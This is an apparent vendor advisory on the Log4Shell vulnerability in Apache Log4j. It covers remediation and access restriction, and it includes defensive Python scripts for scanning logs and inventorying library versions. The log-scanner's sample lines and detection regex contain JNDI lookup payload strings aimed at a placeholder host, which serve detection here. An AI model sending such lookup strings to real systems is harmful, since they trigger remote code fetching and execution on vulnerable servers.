
As many of you will be aware, a recent and severe vulnerability (CVE-2021-44228) affecting versions 2.0 through 2.14.1 of the Apache Log4j Java logging library has been discovered. This vulnerability allows unauthenticated remote code execution in a highly popular library that is used by a large number of major applications and web services. Originally reported by the Alibaba Cloud Security Team, the vulnerability has been given the maximum CVSS score of 10 due to the wide use of Log4j and the ease of exploitation.

What effect does this have on my business?

The Log4j library can be found in countless servers all over the world, which means that cyber criminals can leverage this vulnerability to inject arbitrary code into those servers and eventually achieve complete system takeover. This poses a clear and significant security threat to businesses everywhere.

The vulnerability, also known as Log4Shell, can be taken advantage of with ease. An attacker only needs to get a vulnerable application to write a single malicious string to its log; if message lookup substitution is enabled, the Java Naming and Directory Interface (JNDI) is used to resolve that lookup, fetch a remote resource and execute whatever malicious payload has been retrieved.
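Because the exploit hinges on an attacker-controlled string reaching the log, one immediate defensive step is to sweep web, proxy and application logs for the lookup syntax described above. The following script is an added example (not code from the original post or from Netskope) that flags lines containing a `${jndi:<protocol>:` lookup string and tallies which protocols they requested; the access-log lines are constructed for the example and the hostnames are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not taken from the original post). The two
# suspicious entries carry a JNDI lookup string in the query string and User-Agent,
# fields that many applications pass straight into Log4j. Hostnames are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup-host.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /search?q=${JNDI:ldaps://lookup-host.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /about HTTP/1.1" 200 256 "-" "Mozilla/5.0"',
]

# "${jndi:<protocol>:" is the start of the lookup Log4j would try to resolve.
# Log4j treats the lookup name case-insensitively, so the pattern does too.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)


def find_jndi_lookups(line: str) -> List[str]:
    """Return the protocol named by each JNDI lookup string found in one log line."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(line)]


def scan_log(lines) -> List[Dict]:
    """Flag every line containing a JNDI lookup string, with its line number and protocols."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        protocols = find_jndi_lookups(line)
        if protocols:
            hits.append({"line": lineno, "protocols": protocols, "text": line})
    return hits


def summarise(hits: List[Dict]) -> Dict[str, int]:
    """Count flagged lookups per protocol, a quick view of what they were pointed at."""
    counts: Dict[str, int] = {}
    for hit in hits:
        for proto in hit["protocols"]:
            counts[proto] = counts.get(proto, 0) + 1
    return counts


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG_LINES)
    for hit in flagged:
        print(f"line {hit['line']}: {hit['protocols']}: {hit['text']}")
    print(summarise(flagged))
```

Run it against exported log files by replacing `SAMPLE_LOG_LINES` with the file's lines. A hit means the string reached your infrastructure, not necessarily that it was logged by a vulnerable Log4j instance, so each one still needs triage against the inventory of affected applications; and because attackers also disguise the lookup prefix, a clean result from this simple pattern is a first pass, not proof of absence.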

Steps to remediation

Users are highly encouraged to update their Log4j library to the latest release from Apache (currently Log4j 2.16.0) which has completely removed the JNDI Lookup functionality by default.

Lookups in configuration still work. Furthermore, Log4j now disables access to JNDI by default, so JNDI lookups in configuration need to be enabled explicitly. Log4j also now limits the permitted protocols by default to only Java, LDAP, and LDAPS, and restricts the LDAP protocols to accessing Java primitive objects only. Hosts other than the local host need to be explicitly allowed.

Refer to the Apache Logging Services website for regular updates.

Vulnerability Assessments and Patch Management

The more servers and users you have within your business, the longer it takes to check for and patch vulnerabilities, because each affected system needs its own assessment and its own patch.
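Finding every copy of the library is the first half of that work: log4j-core is frequently bundled inside application WAR and EAR files rather than installed as a standalone jar, so a name-based search of the filesystem misses it. The following inventory script is an added example (not code from the original post, from Netskope, or from the Apache project) that opens each jar/war/ear under a directory, descends into nested archives, reads the Maven `pom.properties` that log4j-core ships with, and grades the version against the ranges stated above (2.0 through 2.14.1 affected, 2.16.0 recommended). The `build_sample_*` helpers construct stand-in archives containing only that metadata so the script can be exercised without real Log4j binaries.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Maven metadata that log4j-core ships inside its jar; its "version=" line names the release.
LOG4J_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Version bounds taken from the advisory text: 2.0 through 2.14.1 affected, 2.16.0 recommended.
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)
RECOMMENDED = (2, 16, 0)

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '2.14.1' or '2.0-beta9' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def classify(version: Tuple[int, int, int]) -> str:
    """Grade a log4j-core version against the affected range and the recommended release."""
    if AFFECTED_MIN <= version <= AFFECTED_MAX:
        return "vulnerable"
    if version < RECOMMENDED:
        return "below-recommended"
    return "ok"


def _version_from_properties(props: str) -> Optional[str]:
    for line in props.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            return value.strip()
    return None


def find_log4j_core(archive: bytes, path: str = "<archive>") -> Dict[str, str]:
    """Map every log4j-core found to its version, descending into nested jars/wars/ears."""
    found: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        names = zf.namelist()
        if LOG4J_CORE_POM in names:
            version = _version_from_properties(zf.read(LOG4J_CORE_POM).decode("utf-8", "replace"))
            if version:
                found[path] = version
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                found.update(find_log4j_core(zf.read(name), f"{path}!{name}"))
    return found


def assess(archive: bytes, path: str = "<archive>") -> List[Tuple[str, str, str]]:
    """Return (location, version, status) for each log4j-core inside one archive."""
    return [(p, v, classify(parse_version(v))) for p, v in sorted(find_log4j_core(archive, path).items())]


def scan_directory(root: Path) -> List[Tuple[str, str, str]]:
    """Assess every jar/war/ear below root; unreadable or non-zip files are reported as errors."""
    results: List[Tuple[str, str, str]] = []
    for file in root.rglob("*"):
        if file.is_file() and file.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                results.extend(assess(file.read_bytes(), str(file)))
            except (zipfile.BadZipFile, OSError, ValueError) as exc:
                results.append((str(file), "-", f"error: {exc}"))
    return results


def build_sample_container(entries: Dict[str, bytes]) -> bytes:
    """Constructed zip archive (a stand-in jar/war) holding the given entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_jar(version: str) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the Maven metadata, no library code."""
    props = f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n"
    return build_sample_container({LOG4J_CORE_POM: props.encode()})


if __name__ == "__main__":
    import sys
    for location, version, status in scan_directory(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print(f"{status:18} {version:10} {location}")
```

Run it as `python scan_log4j.py /opt/apps` on each host and collect the output centrally; anything graded `vulnerable` or `below-recommended` goes on the patch list. The check relies on the Maven metadata being present, so a jar that has been repackaged or shaded without it will not be reported, which is why class-level checks are a worthwhile second pass.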

Acronis Cyber Protect Cloud enables simple, fast, and reliable vulnerability assessment and patch management functionalities. By automatically retrieving and installing critical updates as soon as they become available, the solution ensures minimal exposure time to zero-day exploits — keeping your systems and data safe from cutting-edge cyberthreats while reducing the demand on IT resources.

Private Access

If you are running internal applications that cannot be immediately patched, you can mitigate the risk of exploitation by limiting access to the app. A private access solution, such as Netskope Private Access, can be used to make private apps invisible to external attackers who seek to exploit vulnerable services. Furthermore, a private access solution can restrict access to a private app internally, such that only authorised users are able to access the app, reducing the risk that a compromised user or device could be used to exploit vulnerable services.